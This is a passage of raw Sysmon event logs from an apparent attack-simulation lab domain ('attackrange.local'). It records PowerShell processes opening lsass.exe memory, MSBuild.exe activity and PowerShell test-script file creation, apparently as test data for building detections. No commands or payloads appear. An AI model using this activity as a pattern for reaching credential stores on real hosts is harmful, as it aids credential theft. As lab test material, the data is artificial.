AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000107787Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:02.997{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03E81651A8A62376693747D62F749BBC,SHA256=E344A9DFF1F8CE6774D981212E2032D4E0880CF2103C0E4015BC4B15DEC35BDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083661Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:04.495{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DE231068A887E7029A9626045620E1A,SHA256=0D005930B83F9D29BA0CA092A3E267EA6759A1A3F4D7212F4B9CF2E97F6060FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107992Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.988{58E9C193-B538-615A-7C02-00000000FC01}2956ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4p14egud.opy.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107991Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.988{58E9C193-B538-615A-7C02-00000000FC01}2956ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3hl5r3sd.ech.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107990Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.988{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B538-615A-6D02-00000000FC01}6984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107989Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.972{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B538-615A-6D02-00000000FC01}6984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000107988Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.972{58E9C193-B538-615A-7C02-00000000FC01}2956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3hl5r3sd.ech.ps12021-10-04 08:03:04.972 10341000x8000000000000000107987Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.956{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B538-615A-6B02-00000000FC01}7816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107986Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.956{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B538-615A-6B02-00000000FC01}7816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000107985Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.956{58E9C193-B538-615A-7402-00000000FC01}7400ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_fg04l5gk.hsm.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107984Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.956{58E9C193-B538-615A-7702-00000000FC01}7376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_11qx2vi2.l1v.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107983Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.956{58E9C193-B538-615A-7702-00000000FC01}7376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_05gzutbo.ixp.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - rename failed with status 0xc0000022 23542300x8000000000000000107982Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.956{58E9C193-B538-615A-7402-00000000FC01}7400ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_f2mxxmyo.pcu.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107981Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.941{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7C02-00000000FC01}2956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000107980Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:03:04.941{58E9C193-B538-615A-6D02-00000000FC01}6984\PSHost.132778081846654933.6984.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000107979Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.919{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7646E200C01531F7A965610C3EAF3384,SHA256=6C2D672CCA9DABE1CE97CD2D6FE13734AFFE8E8444160BF6E020ECCFBB5F040C,IMPHASH=00000000000000000000000000000000falsetrue 17141700x8000000000000000107978Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:03:04.919{58E9C193-B538-615A-6B02-00000000FC01}7816\PSHost.132778081846521117.7816.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x8000000000000000107977Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.919{58E9C193-B538-615A-7702-00000000FC01}7376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_05gzutbo.ixp.ps12021-10-04 08:03:04.919 23542300x8000000000000000107976Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.903{58E9C193-B538-615A-6D02-00000000FC01}6984ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_i4d0iuyx.0ef.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000107975Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.903{58E9C193-B538-615A-7402-00000000FC01}7400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_f2mxxmyo.pcu.ps12021-10-04 08:03:04.903 23542300x8000000000000000107974Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.888{58E9C193-B538-615A-6D02-00000000FC01}6984ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_13edeuwn.1tx.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107973Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.872{58E9C193-B538-615A-6B02-00000000FC01}7816ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0t5hjiwg.n12.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107972Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.872{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7702-00000000FC01}7376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107971Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.872{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7402-00000000FC01}7400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000107970Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.857{58E9C193-B538-615A-6D02-00000000FC01}6984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_13edeuwn.1tx.ps12021-10-04 08:03:04.857 23542300x8000000000000000107969Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.857{58E9C193-B538-615A-6B02-00000000FC01}7816ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_m2x0fdp4.rzl.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107968Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.857{58E9C193-AE68-615A-C800-00000000FC01}45484664C:\Windows\Explorer.EXE{58E9C193-B538-615A-7902-00000000FC01}1444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107967Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.857{58E9C193-AE68-615A-C800-00000000FC01}45484664C:\Windows\Explorer.EXE{58E9C193-B538-615A-7902-00000000FC01}1444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107966Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.857{58E9C193-AE68-615A-C800-00000000FC01}45484664C:\Windows\Explorer.EXE{58E9C193-B538-615A-7902-00000000FC01}1444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107965Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.841{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B538-615A-7B02-00000000FC01}7256C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107964Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.841{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B538-615A-7B02-00000000FC01}7256C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107963Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.819{58E9C193-AE68-615A-C800-00000000FC01}45484984C:\Windows\Explorer.EXE{58E9C193-B538-615A-7902-00000000FC01}1444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107962Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.819{58E9C193-AE68-615A-C800-00000000FC01}45484984C:\Windows\Explorer.EXE{58E9C193-B538-615A-7902-00000000FC01}1444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107961Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.819{58E9C193-AE68-615A-C800-00000000FC01}45484984C:\Windows\Explorer.EXE{58E9C193-B538-615A-7902-00000000FC01}1444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107960Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.819{58E9C193-AE68-615A-C800-00000000FC01}45484984C:\Windows\Explorer.EXE{58E9C193-B538-615A-7902-00000000FC01}1444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107959Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.819{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B538-615A-7B02-00000000FC01}7256C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107958Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.819{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B538-615A-7B02-00000000FC01}7256C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107957Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.819{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B538-615A-7B02-00000000FC01}7256C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107956Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 